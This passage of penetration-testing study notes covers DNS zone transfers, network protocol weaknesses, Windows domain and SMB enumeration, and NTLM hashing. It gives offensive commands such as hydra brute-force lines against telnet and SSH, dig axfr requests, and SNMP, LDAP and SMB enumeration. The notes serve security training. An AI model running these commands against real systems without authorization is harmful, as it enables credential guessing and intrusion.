o reg.exe
B14) Audit Techniques
Windows listing processes with network sockets:

TCPView from SysInternals or on the command line:
# netstat -a -o -n -b
Unix
# netstat -tulpen (Linux)
# lsof (Solaris)
Assessing Patch Level

• Windows: The Microsoft Baseline Security Analyzer (MBSA)
• Unix: /usr/lib/update-notifier/apt-check 2>&1 | cut -d ';' -f 2 (list pending security updates on debian
based systems)
2) Background Information Gathering and Open Source
C1) Registration Records
➜ ~ whois vantagepoint.sg
----------------------------------------------------------------------
SGNIC WHOIS Server
----------------------------------------------------------------------
The following data is provided for information purposes only.
Registrar: INSTRA CORPORATION PTY. LTD.
Domain Name: VANTAGEPOINT.SG
Creation Date: 26-Feb-2014 04:43:30
Modified Date: 20-Mar-2014 08:31:04
Expiration Date: 26-Feb-2018 04:43:30
Domain Status: OK
Domain Status: VerifiedID@SG-Mandatory
Domain Status: VerifiedID@SG-OK (VERIFIED BY ADMIN CONTACT)
Registrant:
Name: VANTAGE POINT SECURITY PTE. LTD. (SGNIC-ORG1350730)
Administrative Contact:
Name: JACQUELINE LOW (SGNIC-PER20054416)
Technical Contact:
Name: VANTAGE POINT SECURITY PTE. LTD. (SGNIC-ORG1350731)
Email: [email protected]
Name Servers:
NS1.INSTRADNS.COM
NS2.INSTRADNS.COM
NS3.INSTRADNS.COM
DNSSEC:
unsigned
C2) Domain Name Server (DNS)

DNS Zone transfer (manually)
DNS Zone transfer is the process where a DNS server passes a copy of part of it's database (which is called a
"zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about
a particular zone; there is a Master DNS server, and one or more Slave DNS servers, and the slaves ask the
master for a copy of the records for that zone.
A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a slave and ask the master for a
copy of the zone records. And it sends you them.
• Successful Zone Transfer:
o dig @ns1.sedoparking.comavhackers.com avhackers.com axfr
o dig @server domain axfr
• Zone Transfer Failed:

o dig @ns1.google.com google.com axfr
DNS Resource Records (RR)

Sample dig request.
The output can be interpreted as:

vantagepoint.sg. 21571 IN A 184.95.38.200
A 16 bit value which
32 bit value. The Time to
defines the protocol family
Live in seconds (range is 1 to The
or an instance of the
2147483647) and indicates Resource
The name being protocol. The normal value
how long the RR may be Record type. IP address
returned is IN = Internet protocol
cached. The value zero See below
(other values are HS and
indicates the data should for samples.
CH both historic MIT
not be cached.
protocols).
Zone DNS database is a collection of resource records and each of the records provides information about a
specific object. A list of most common records is provided below:
• SRV Record (SRV)
A Service record (SRV record) is a specification of data in the Domain Name System defining the
location, i.e. the hostname and port number, of servers for specified services.
• A SRV record has the form:

o _service._proto.name. TTL class SRV priority weight port target.
o service: the symbolic name of the desired service.
o proto: the transport protocol of the desired service; this is usually either TCP or UDP.
o name: the domain name for which this record is valid, ending in a dot.
o TTL: standard DNS time to live field.
o class: standard DNS class field (this is always IN).
o priority: the priority of the target host, lower value means more preferred.
o weight: A relative weight for records with the same priority, higher value means more
preferred.
o port: the TCP or UDP port on which the service is to be found.
o target: the canonical hostname of the machine providing the service, ending in a dot.
An example SRV record in textual form that might be found in a zone file might be the following:
_sip._tcp.example.com. 86400 IN SRV 0 5 5060 sipserver.example.com. This points to a server named

sipserver.example.com listening on TCP port 5060 for Session Initiation Protocol (SIP) protocol services. The
priority given here is 0, and the weight is 5. As in MX records, the target in SRV records must point to
hostname with an address record (A or AAAA record). Pointing to a hostname with a CNAME record is not a
valid configuration.
Address Mapping records (A)

The record A specifies IP address (IPv4) for given host. A records are used for conversion of domain names to
corresponding IP addresses.
IP Version 6 Address records (AAAA)

The record AAAA (also quad-A record) specifies IPv6 address for given host. So it works the same way as the A
record and the difference is the type of IP address.
Canonical Name records (CNAME)

A Canonical Name record (abbreviated as CNAME record) is a type of resource record in the Domain Name
System (DNS) used to specify that a domain name is an alias for another domain, which is the "canonical"
domain. All information, including subdomains, IP addresses, etc., are defined by the canonical domain.
This can prove convenient when running multiple services (like an FTP server and a webserver; each running
on different ports) from a single IP address. One can, for example, point ftp.example.com and
www.example.com to the DNS entry for example.com, which in turn has an A record which points to the IP
address. Then, if the IP address ever changes, one only has to record the change in one place within the
network: in the DNS A record for example.com.
CNAME records must always point to another domain name, never directly to an IP address.
Host Information records (HINFO)

HINFO records are used to acquire general information about a host. The record specifies type of CPU and OS.
The HINFO record data provides the possibility to use operating system specific protocols when two hosts
want to communicate. For security reasons the HINFO records are not typically used on public servers.
Note: Standard values in RFC 1010
Integrated Services Digital Network records (ISDN)

The ISDN resource record specifies ISDN address for a host. An ISDN address is a telephone number that
consists of a country code, a national destination code, a ISDN Subscriber number and, optionally, a ISDN
subaddress. The function of the record is only variation of the A resource record function.
Mail exchanger record (MX)

The MX resource record specifies a mail exchange server for a DNS domain name. The information is used by
Simple Mail Transfer Protocol (SMTP) to route emails to proper hosts. Typically, there are more than one mail
exchange server for a DNS domain and each of them have set priority.
Example:
msn.com MX preference = 5, mail exchanger = mx2.hotmail.com
msn.com nameserver = ns3.msft.net

mx1.hotmail.com internet address = 65.55.92.184
Name Server records (NS)

The NS record specifies an authoritative name server for given host.
Reverse-lookup Pointer records (PTR)

As opposed to forward DNS resolution (A and AAAA DNS records), the PTR record is used to look up domain
names based on an IP address.
Start of Authority records (SOA)

The record specifies core information about a DNS zone, including the primary name server, the email of the
domain administrator, the domain serial number, and several timers relating to refreshing the zone.
Text records (TXT)

The text record can hold arbitrary non-formatted text string. Typically, the record is used by Sender Policy
Framework (SPF) to prevent fake emails to appear to be sent by you.
C3) Customer Web Site Analysis
C4) Google Hacking and Web Enumeration
C5) NNTP Newsgroups and Mailing Lists
C6) Information Leakage from Mail & News Headers
3) Networking Equipment
D1) Management Protocols
Weaknesses
• Telnet Weaknesses:
o Not encrypted (plaintext communication), this means username and password are also sent
unencrypted during login
o exploits available in metasploit
o Brute force attacks
▪ hydra -l admin -P passlist.txt 192.168.0.7 telnet
• Web based Protocols Weaknesses
o If HTTP is used its plaintext communication, this means username and password are also sent
unencrypted during login
o All weaknesses in OWASP Top 10...
o Brute force attacks by using Burp intruder
• SSH Weaknesses
o Password authentication is prone to brute force attacks
▪ hydra -l admin -P passlist.txt 192.168.0.7 ssh
• SNMP Weaknesses
o default values are used for community strings (public/private)
o SNMPv1 and version 2 are not encrypted, only version 3 supports encryption
o tools:
▪ snmpcheck -t 10.16.108.41 -c public
▪ snmpwalk -v1 -c public 10.10.1.224
• TFTP Weaknesses
o TFTP includes no login or access control mechanisms. Care must be taken when using TFTP
for file transfers where authentication, access control, confidentiality, or integrity checking
are needed. Note that those security services could be supplied above or below the layer at
which TFTP runs. Care must also be taken in the rights granted to a TFTP server process so as
not to violate the security of the server's file system. TFTP is often installed with controls
such that only files that have public read access are available via TFTP. Also listing, deleting,
renaming, and writing files via TFTP are typically disallowed. TFTP file transfers are NOT
RECOMMENDED where the inherent protocol limitations could raise insurmountable liability
concerns
• Cisco Reverse Telnet Weaknesses

o https://supportforums.cisco.com/document/69481/reverse-telnet-aux-portdocx
o Once connected to a port of the cisco device, another device can be reached via a reverse
telnet session
• NTP Weaknesses (Security best practices)

D2) Network Traffic Analysis
Network Sniffer:
In general, for network sniffers there is:
• <capture filter> packet filter in libpcap filter syntax. This is used to filter data that is saved into a pcap
or written to console, e.g.
o port 80 or port 443 and not arp (filter 80, 443 and skip ARP)
o host 192.168.0.1 (filter only for packets that are sent from or to this host)
o dst host 192.168.1.1 and (dst port 80 or dst port 443) (Capture any packets with destination
IP 192.168.1.1 and destination port 80 or 443)
• <read filter> packet Read filter in Wireshark display filter syntax. This is used to filter data that is read
from a pcap, e.g.
o ip.addr==192.168.0.1 // show only packets that are sent from or to this IP
o tcp.port eq 25 or icmp // show only port 25 and ICMP packets
Tools:
• Wireshark
• tshark
o http://www.codealias.info/technotes/the_tshark_capture_and_filter_example_page
o https://hackertarget.com/tshark-tutorial-and-filter-examples/
▪ Write all packets to a file called test.pcap and apply a packet filter for ports 80 and
443 on interface en0. (-P will still show the output on the console even though all is
written to test.pcap)
▪ tshark -w test.pcap -f "port 80 or port 443" -i en0 -P // libpcap filter syntax
▪ Read test.pcap and apply a read filter to only show the IP address 192.168.0.101
▪ tshark -r test.pcap -Y "ip.addr==192.168.0.101" // Wireshark display filter
• Ettercap
o Man in the middle attack
o It is capable of intercepting traffic on a network segment, capturing passwords, and
conducting active eavesdropping against a number of common protocols.
D3) Network Protocols

Address Resolution Protocol (ARP)
In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which
an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally,
the aim is to associate the attacker's MAC address with the IP address of another host, such as the default
gateway, causing any traffic meant for that IP address to be sent to the attacker instead.
MAC Flooding. Since switches are responsible for setting up the virtual circuits from one node to another, they
must keep a translation table that tracks which addresses (specifically, which MAC addresses) are on which
physical port. The amount of memory for this translation table is limited. This fact sometimes allows the switch
to be exploited by flooding the translation table. Primitive switches, not knowing how to handle the excess
data, will 'fail open'. That is, it will revert to a hub and will broadcast all network frames to all ports. At this
point generic network sniffers will work.
MAC Duplicating. It's not difficult to imagine that, since all frames on the network are routed based on their
MAC address, that the ability to impersonate another host would work to our advantage. That's just what MAC
duplicating does. You reconfigure Node B to have the same MAC address as the machine whose traffic you're
trying to sniff. This differs from ARP Spoofing because, in ARP Spoofing, we are 'confusing' the host by
poisoning it's ARP cache. In a MAC Duplicating attack, we actually confuse the switch itself into thinking two
ports have the same MAC address. Since the data will be forwarded to both ports, no IP forwarding is
necessary.
Dynamic Host Configuration Protocol (DHCP)

Unauthorized DHCP Servers: If a malicious person plants a “rogue” DHCP server, it is possible that this device
could respond to client requests and supply them with spurious configuration information. This could be used
to make clients unusable on the network, or worse, set them up for further abuse later on. For example, a
hacker could exploit a bogus DHCP server to direct a DHCP client to use a router under the hacker's control,
rather than the one the client is supposed to use.
Unauthorized DHCP Clients: A client could be set up that masquerades as a legitimate DHCP client and thereby
obtain configuration information intended for that client; this could then be used to compromise the network
later on. Alternately, a “bad guy” could use software to generate lots of bogus DHCP client requests to use up
all the IP addresses in a DHCP server's pool. More simply, this could be used by a thief to steal an IP address
from an organization for his own use.
Cisco Discovery Protocol (CDP)

The Cisco Discovery Protocol is a proprietary protocol that all Cisco devices can use by default. CDP discovers
other Cisco devices that are directly connected, which makes possible to the devices to auto-configure their
connection in some cases, simplifying configuration and connectivity. CDP messages are not encrypted.
Attacker can easily use Wireshark or other networking analyzer software to sniff information about devices
that CDP is sending across the network in a broadcast messages. The Cisco IOS software version discovered via
CDP, in particular, would allow the attacker to research and determine whether there were any security
vulnerabilities specific to that particular version of code. Also, because CDP is unauthenticated, an attacker
could craft bogus CDP packets and have them received by the attacker’s directly connected Cisco device. If the
attacker can get access to the router either via Telnet or SNMP, they can use the CDP information to discover
the entire topology of your network at Layer 2 and 3, including all IOS levels, router and switch model types,
and IP addressing. If somebody was armed with this information and a Cisco bug list, they could launch a very
effective attack against your network.
Hot Standby Router Protocol (HSRP)

Hot Standby Router Protocol (HSRP) is used to provide the access layer with high availability when hosts
require only a default static route. It is used to group two or more Layer 2 routers into one virtual router. The
physical routers keep their MAC and IP addresses, while the virtual router assumes new information, which is
shared between the physical routers.
According to the HSRP RFC, the protocol is not a secure protocol, and is therefore susceptible to Man in the
Middle (MitM) attacks.
Virtual Router Redundancy Protocol (VRRP)

The VRRP or Virtual Router Redundancy Protocol helps you create a reliable network by using multiple routers
in an active/passive configuration. If the primary router fails, the backup router takes over almost seamlessly.
A host within the same subnet could just spoof VRRP packets and disrupt service.
An attack on VRRP is not just theoretical. A tool called Loki allows you to take over the virtual IP-address and
become the master router. This will allow you to create a DoS or sniff all traffic.
According to rfc3768 authentication and security has been deliberately omitted.
VLan Trunk Protocol (VTP)

This attack is based on Spanning Tree. VTP reduces administration in a switched network. When configuring a
new VLAN on one VTP server, the VLAN is distributed through all switches in the domain. This reduces the
need of configuring the same VLAN everywhere. VTP is a Cisco-proprietary protocol that is available on most of
the Cisco Catalyst family products
After becoming a trunk port, an attacker could send VTP messages as a server with no VLANs configured. All
VLANs would be deleted across the entire VTP domain. This attack could be played accidentally, i.e. by
inserting a new switch on the network which has a bad configuration (this is referring by Cisco
[1]#vtp_ts_rec_ins.).
https://www.sans.org/reading-room/whitepapers/networkdevs/virtual-lan-security-weaknesses-
countermeasures-1090
Spanning Tree Protocol (STP)

STP is used to maintain loop free network topologies. This is achieved using Bridge Protocol Data Units (BPDU)
which are very simple packets with no payload. By using BPDUs, a switch is chosen as the Root Bridge which
then defines how traffic is routed round the network. In such an exchange, it can take around 30seconds to
establish which switch is to be the Root Bridge. An attacker has two options. One is to repeatedly send
Topology Change Notification (TCN) messages to disrupt the system’s current understanding of the network
and force renegotiation of the Root Bridge, resulting in a DoS attack. An alternative is to send a specially
crafted BPDU to try and become the Root Bridge. Once this is done, then it is possible for the attacker to see
packets that are not intended forhim/her. This is not trivial and requires for the attacker to stay connected to
two switches, running bridging software, so that he/she can advertise as a priority zero bridge.
Terminal Access Controller Access-Control System Plus (TACACS+)

TACACS+ is a protocol developed by Cisco and released as an open standard beginning in 1993. Although
derived from TACACS, TACACS+ is a separate protocol that handles authentication, authorization, and
accounting (AAA) services. TACACS+ and other flexible AAA protocols have largely replaced their predecessors.
• Lack of integrity checking
• Vulnerability to replay attacks
More information http://www.openwall.com/articles/TACACS%2B-Protocol-Security
D4) IPSec
Tool:
ipsecscan (ipsecscan is a Win32 command-line utility that can identify IPsec enabled devices and hosts; it's
available at http://ntsecurity.nu/toolbox/ipsecscan/.[1])
nmap -p 500 <IP>
D5) VOIP
Interesting service for VoIP, if identified by nmap:

• Cisco-sccp
• H.323/Q.931
• SIP
SIP = signalling and creating connection

RTP = transport of media
Session Initiation Protocol (SIP)
The Session Initiation Protocol (SIP) is a communications protocol for signaling and controlling multimedia
communication sessions. The most common applications of SIP are in Internet telephony for voice and video
calls, as well as instant messaging, over Internet Protocol (IP) networks.
SIPS is the secure SIP protocol that offers also TLS encryption.
SIP is on port 5060
SIPS is on port 5061
Real-time Transport Protocol (RTP)

RTP is a network protocol for delivering audio and video over IP networks. RTP is used extensively in
communication and entertainment systems that involve streaming media, such as telephony, video
teleconference applications, television services and web-based push-to-talk features.
RTP typically runs over User Datagram Protocol (UDP).
D6) Wireless
A client can use two scanning methods: active and passive. During an active scan, the client radio transmits a
probe request and listens for a probe response from an AP. With a passive scan, the client radio listens on each
channel for beacons sent periodically by an AP. A passive scan generally takes more time, since the client must
listen and wait for a beacon versus actively probing to find an AP. Another limitation with a passive scan is that
if the client does not wait long enough on a channel, then the client may miss an AP beacon.
Tools:
Wireshark
Kismet
Wired Equivalent Privacy (WEP)

WEP has three settings: Off (no security), 64-bit and 128-bit.
Temporal Key Integrity Protocol (TKIP)

The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key
for each packet. Used by WPA.
WiFi Protected Access (WPA)

WPA is using TKIP encryption by default but can also use AES.
WPA2 is using AES for encryption
Lightweight Extensible Authentication Protocol (LEAP)

LEAP is a proprietary wireless LAN authentication method developed by Cisco Systems. Important features of
LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP
allows for clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new
WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to
use TKIP instead of dynamic WEP.
Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password
cracking.
Extensible Authentication Protocol (EAP)

Originally, only EAP-TLS (Extensible Authentication Protocol - Transport Layer Security) was certified by the Wi-
Fi alliance. In April 2010, the Wi-Fi Alliance announced the inclusion of additional EAP[13] types to its WPA-
and WPA2- Enterprise certification programs.[14] This was to ensure that WPA-Enterprise certified products
can interoperate with one another.
As of 2010 the certification program includes the following EAP types:

• EAP-TLS (previously tested)
• EAP-TTLS/MSCHAPv2 (April 2005 [15])
• PEAPv0/EAP-MSCHAPv2 (April 2005)
• PEAPv1/EAP-GTC (April 2005)
• PEAP-TLS
• EAP-SIM (April 2005)
• EAP-AKA (April 2009 [16])
• EAP-FAST (April 2009)
802.1X clients and servers developed by specific firms may support other EAP types. This certification is an
attempt for popular EAP types to interoperate; their failure to do so as of 2013 is one of the major issues
preventing rollout of 802.1X on heterogeneous networks.
Protected Extensible Authentication Protocol (PEAP)

The Protected Extensible Authentication Protocol, also known as Protected EAP or simply PEAP, is a protocol
that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated
Transport Layer Security (TLS) tunnel.[1][2][3][4] The purpose was to correct deficiencies in EAP; EAP assumed
a protected communication channel, such as that provided by physical security, so facilities for protection of
the EAP conversation were not provided.
PEAP was jointly developed by Cisco Systems, Microsoft, and RSA Security.
D7) Configuration Analysis
Cisco IOS devices:

Enable Password:
To set a local password to control access to various privilege levels, use the enable password command in
global configuration mode.
enable password [level level] {password | [encryption-type] encrypted-password}

no enable password [level level]
Syntax Description
(Optional) Level for which the password applies. You can specify up to 16 privilege levels,
using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is
level level
not specified in the command or the no form of the command, the privilege level defaults to
15 (traditional enable privileges).
password Password users type to enter enable mode.
(Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only
encryption-
encryption type available is 5. If you specify encryption-type, the next argument you supply
type
must be an encrypted password (a password already encrypted by a Cisco router).
encrypted-
Encrypted password you enter, copied from another router configuration.
password
Enable Secret
To create a new privilege level and associate commands with that privilege level, use the following commands
in beginning in global configuration mode:
Sets the password for the specified privilege level. This is the
password users will enter after entering the enable level command
Router(config)# enable secret
to access the specified level.
level level {0 |5} password-string
• 0 indicates an unencrypted password string follows; 5 indicates
an encrypted password string follows.
Syntax Description
(Optional) Level for which the password applies. You can specify up to sixteen privilege levels,
using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is
level level
not specified in the command or in the no form of the command, the privilege level defaults
to 15 (traditional enable privileges). The same holds true for the no form of the command.
Password for users to enter enable mode. This password should be different from the
password
password created with the enable password command.
(Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only
encryption- encryption type available for this command is 5. If you specify encryption-type, the next
type argument you supply must be an encrypted password (a password encrypted by a Cisco
router).
encrypted-
Encrypted password you enter, copied from another router configuration.
password
4) Microsoft Windows Security Assessment
E1) Domain Reconnaissance
Identifying domains/workgroups and domain membership within the target network.

• Difference Workgroup/Domain:
o A domain is a collection of servers and clients that are managed by a central security system
(Active Directory hosted on the Domain Controller). Active Directory controls what
computers can communicate within the domain and which users can access shared
resources.
o A workgroup does not have a central control, every system is a peer and no security
information is shared or enforced outside of each individual box.
• The Domain Master Browser is necessary on a routed TCP/IP network, that is, when a Windows
domain spans more than one TCP/IP network. When a Windows domain spans multiple subnets each
of the subnets has an independent browser called the Master Browser. The Master Browser is
responsible for the browse list within its respective subnet and portion of the domain on its subnet.
Locally on Windows:
• Check locally on a Windows Server/Client. This will list both Local and Global groups that user belongs
to.
o net user <userName> /domain
Remote:
• Identify the "Master "Browser" on a Windows Machine
o nbtstat -A COMPUTER-NAME
o The numeric values are called suffixes.For example the <01> and <1D> suffixes indicates the
Master Browser,the <20> that the machine is running File Server service,the <03> that a
messenger service is running and the <00> means that a workstation service is running as
well.The <1E> is the Browser Service Elections.
• Scan with nbtscan on Kali. The nbtscan is a netbios nameserver scanner which has the same functions
as nbtstat but it operates on a range of addresses instead of one.
o nbtscan 192.168.0.1-254
o As we can see from the image above we have discovered the IP addresses,the NetBIOS
names,the users that are logged in and the MAC addresses from the hosts that are running
the NetBIOS service on the network.
o With the verbose option the output format is similar to the nbtstat. Again the <01> indicates
the Master Browser service,the <00> the workstation,the <20> the File Server service and
the <1e> and <1d> the Browser Service Elections and the Master Browser.Also we can see
that the domain that this workstation belongs is London.
MSBROWSE
Identifying and analysing internal browse lists.

What is a browse list? Read this: https://en.wikipedia.org/wiki/Domain_Master_Browser
How can the internal browser list be analysed?
Identifying and analysing accessible SMB shares:

By using Unix:
• nmap --script smb-enum-shares.nse -p445 <host>
• sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
• nmblookup -A <IP> (get Netbios Name that can be used for smbclient)
• smbclient -L \\NetBiosName -I <IP> -N
o -L List available shares, this can also show logged in users.
o -N suppresses password prompt. Instead also -U can be used to specify the username if any
is known.
• smbclient //NetBiosName/share -I <IP> -U <username>
o Connect to share. Files can be downloaded (get) or uploaded (put) or read directly using
(more)
o
• Mount share:
o mount -t cifs //servername/foldername /localmountpoint -o
username=myusername,password=mypassword
By using Windows:
• To see a list of shares on a remote computer
o NET VIEW \\ComputerName
• To see a list of all shares in the domain:
o NET VIEW /DOMAIN
• To see a list of shares on a different domain
o NET VIEW /DOMAIN:domain name
• Mount share:
o net use z: \\<IP>\share password /user:Domain\user
• net share
IIS Version Hosting Operating System
E2) User Enumeration
NetBIOS
• Enumerates NetBIOS information on host 192.168.1.1 as the null user.
o nbtenum -q 192.168.1.1
• Scan with nbtscan on Kali. The nbtscan is a netbios nameserver scanner which has the same functions
as nbtstat but it operates on a range of addresses instead of one.
o nbtscan 192.168.0.1-254
o As we can see from the image above we have discovered the IP addresses,the NetBIOS
names,the users that are logged in and the MAC addresses from the hosts that are running
the NetBIOS service on the network.
o With the verbose option the output format is similar to the nbtstat. Again the <01> indicates
the Master Browser service,the <00> the workstation,the <20> the File Server service and
the <1e> and <1d> the Browser Service Elections and the Master Browser.Also we can see
that the domain that this workstation belongs is London.
SNMP
• msf > use auxiliary/scanner/snmp/snmp_enumusers
• snmpwalk
o snmpwalk -c public -v 2c <IP>
• snmpcheck
o snmpcheck -t <IP> -c public
LDAP
• ldapsearch can be done by using jxplorer (GUI tool)
• Query ldap by using nmap:
o nmap -p 389 --script ldap-search --script-args
'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilte
r=users,ldap.attrib=sAMAccountName' <host>
What symbols to use to test ldap injection ?

https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OTG-INPVAL-006)
Boolean conditions and group aggregations on an LDAP search filter could be applied by using the following
metacharacters:
Metachar Meaning
& Boolean AND
| Boolean OR
! Boolean NOT
= Equals
~= Approx
>= Greater than
<= Less than
* Any character
() Grouping parenthesis
E3) Active Directory
Active Directory Roles (Global Catalogue, Master Browser, FSMO)

For details see https://support.microsoft.com/en-sg/kb/197132
and https://wiki.samba.org/index.php/Flexible_Single-Master_Operations_(FSMO)_roles
Forests, trees, and domains

The Active Directory framework that holds the objects can be viewed at a number of levels. The forest, tree,
and domain are the logical divisions in an Active Directory network.
Within a deployment, objects are grouped into domains. The objects for a single domain are stored in a single
database (which can be replicated). Domains are identified by their DNS name structure, the namespace.
A domain is defined as a logical group of network objects (computers, users, devices) that share the same
Active Directory database.
A tree is a collection of one or more domains and domain trees in a contiguous namespace, linked in a
transitive trust hierarchy.
At the top of the structure is the forest. A forest is a collection of trees that share a common global catalog,
directory schema, logical structure, and directory configuration. The forest represents the security boundary
within which users, computers, groups, and other objects are accessible.
Reliance of AD on DNS and LDAP Group Policy (Local Security Policy)

• On a Windows Server gpresult can be used to verify all policy settings (Group Poliy Results).
o gpresult > gp.txt
E4) Windows Passwords
Password policies (complexity, lockout policies)

Different parameters can be set in GPO (Group Policy Object):
• Enforce password history
• Maximum password age
• Minimum password age
• Minimum password length
• Password must meet complexity requirements
• Store passwords using reversible encryption
https://technet.microsoft.com/en-us/library/hh994572(v=ws.11).aspx
Hash Storage (merits of LANMAN, NTLMv1 / v2)

https://en.wikipedia.org/wiki/NT_LAN_Manager
• LANMAN:
LM hash, LanMan hash, or LAN Manager hash is a compromised password hashing function that was
the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows NT
used to store user passwords. Support for the legacy LAN Manager protocol continued in later
versions of Windows for backward compatibility, but was recommended by Microsoft to be turned off
by administrators; as of Windows Vista, the protocol is disabled by default, but continues to be used
by some non-Microsoft CIFS implementations.
o The LM hash is computed as follows:

▪ The user's password is restricted to a maximum of fourteen characters.
▪ The user’s password is converted to uppercase.
▪ The user's password is encoded in the System OEM code page.
▪ This password is null-padded to 14 bytes.
▪ The “fixed-length” password is split into two 7-byte halves.
▪ These values are used to create two DES keys, one from each 7-byte half, by
converting the seven bytes into a bit stream with the most significant bit first, and
inserting a null bit after every seven bits (so 1010100 becomes 10101000). This
generates the 64 bits needed for a DES key. (A DES key ostensibly consists of 64 bits;
however, only 56 of these are actually used by the algorithm. The null bits added in
this step are later discarded.)
▪ Each of the two keys is used to DES-encrypt the constant ASCII string
“KGS!@#$%”,[Notes 2] resulting in two 8-byte ciphertext values. The DES
CipherMode should be set to ECB, and PaddingMode should be set to NONE.
▪ These two ciphertext values are concatenated to form a 16-byte value, which is the
LM hash.
• NTLMv1
The server authenticates the client by sending an 8-byte random number, the challenge. The client
performs an operation involving the challenge and a secret shared between client and server,
specifically one of the two password hashes described above. The client returns the 24-byte result of
the computation. In fact, in NTLMv1 the computations are usually made using both hashes and both
24-byte results are sent. The server verifies that the client has computed the correct result, and from
this infers possession of the secret, and hence the authenticity of the client.
Both the hashes produce 16-byte quantities. Five bytes of zeros are appended to obtain 21 bytes. The
21 bytes are separated in three 7-byte (56-bit) quantities. Each of these 56-bit quantities is used as a
key to DES encrypt the 64 bit challenge. The three encryptions of the challenge are reunited to form
the 24-byte response. Both the response using the LM hash and the NT hash are returned as the
response, but this is configurable.
• NTLMv2
NTLMv2, introduced in Windows NT 4.0 SP4,[13] is a challenge-response authentication protocol. It is
intended as a cryptographically strengthened replacement for NTLMv1.
NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in
Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks,
and adding the ability for a server to authenticate to the client.[1][14][15]
NTLMv2 sends two responses to an 8-byte server challenge. Each response contains a 16-byte HMAC-
MD5 hash of the server challenge, a fully/partially randomly generated client challenge, and an
HMAC-MD5 hash of the user's password and other identifying information. The two responses differ
in the format of the client challenge. The shorter response uses an 8-byte random value for this
challenge. In order to verify the response, the server must receive as part of the response the client
challenge. For this shorter response, the 8-byte client challenge appended to the 16-byte response
makes a 24-byte package which is consistent with the 24-byte response format of the previous
NTLMv1 protocol. In certain non-official documentation (e.g. DCE/RPC Over SMB, Leighton) this
response is termed LMv2.
The second response sent by NTLMv2 uses a variable length client challenge which includes (1) the
current time in NT Time format, (2) an 8-byte random value (CC2 in the box below), (3) the domain
name and (4) some standard format stuff. The response must include a copy of this client challenge,
and is therefore variable length. In non-official documentation, this response is termed NTv2.
Both LMv2 and NTv2 hash the client and server challenge with the NT hash of the user's password
and other identifying information. The exact formula is to begin with the NT Hash, which is stored in
the SAM or AD, and continue to hash in, using HMAC-MD5, the username and domain name. In the
box below, X stands for the fixed contents of a formatting field.
Weakness and Vulnerabilities of NTLM
NTLM remains vulnerable to the pass the hash attack, which is a variant on the reflection attack which was
addressed by Microsoft security update MS08-068. For example, Metasploit can be used in many cases to
obtain credentials from one machine which can be used to gain control of another machine.[3][25] The
Squirtle toolkit can be used to leverage web site cross-site scripting attacks into attacks on nearby assets via
NTLM.[26]
In February 2010, Amplia Security discovered several flaws in the Windows implementation of the NTLM
authentication mechanism which broke the security of the protocol allowing attackers to gain read/write
access to files and remote code execution. One of the attacks presented included the ability to predict pseudo-
random numbers and challenges/responses generated by the protocol. These flaws had been present in all
versions of Windows for 17 years. The security advisory explaining these issues included fully working proof-of-
concept exploits. All these flaws were fixed by MS10-012.[27][28]
In 2012, it was demonstrated that every possible 8-character NTLM password hash permutation can be
cracked in under 6 hours.[29]
Offline Password Analysis (rainbow tables / hash brute forcing)

See Crack Password Hashes(OfflineAnalysis)
E5) Windows Vulnerabilities
Read Chapter 15 about Windows Exploits in "Gray Hat Hacking, Third Edition.pdf".
Knowledge of common post exploitation activities:
https://github.com/mubix/post-exploitation
https://www.offensive-security.com/metasploit-unleashed/msf-post-exploitation/
Obtain Password Hashes

See also Metasploit section.
Obtain Locally-Stored clear-text passwords

Check in config files of ASP (Active Server Page), PHP (Personal Home Page) etc to get passwords of database
etc.
Crack Password Hashes

See Crack Password Hashes (Offline Analysis)
Check Patch Levels

• systeminfo
• wmic qfe get hotfixid | find "KB99999" // check if hotfix KB99999 is installed
https://github.com/rapid7/metasploit-framework/wiki/How-to-check-Microsoft-patch-levels-for-your-exploit
Derive list of missing security patches

• https://gallery.technet.microsoft.com/scriptcenter/2d191bcd-3308-4edd-9de2-88dff796b0bc
• https://gallery.technet.microsoft.com/Get-WindowsUpdatesps1-7c82c1f4
E6) Windows Patch Management Strategies
Windows Update Agent (WUA)

The Windows Update Agent runs on client computers and must connect to either one of the following: A
Windows Update server running Windows Server Update Services (WSUS) on the corporate network. The
Windows Update/Microsoft Update (WU/MU) service publicly available from Microsoft.
Systems Management Server (SMS)

System Center Configuration Manager (SCCM, also known as ConfigMgr),[1] formerly Systems Management
Server (SMS)[2] is a systems management software product developed by Microsoft for managing large groups
of computers running Windows NT, Windows Embedded, OS X, Linux or UNIX, as well as Windows Phone,
Symbian, iOS and Android mobile operating systems.[3] Configuration Manager provides remote control, patch
management, software distribution, operating system deployment, network access protection and hardware
and software inventory.
Server update services (SUS) / Windows Server Update Services (WSUS)

Windows Server Update Services (WSUS), previously known as Software Update Services (SUS), is a computer
program developed by Microsoft Corporation that enables administrators to manage the distribution of
updates and hotfixes released for Microsoft products to computers in a corporate environment. WSUS
downloads these updates from the Microsoft Update website and then distributes them to computers on a
network.
Microsoft Baseline Security Analyzer (MBSA)

Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security
state by assessing missing security updates and less-secure security settings within Microsoft Windows,
Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and
Microsoft Office macro settings.
E7) Desktop Lockdown
E8) Exchange
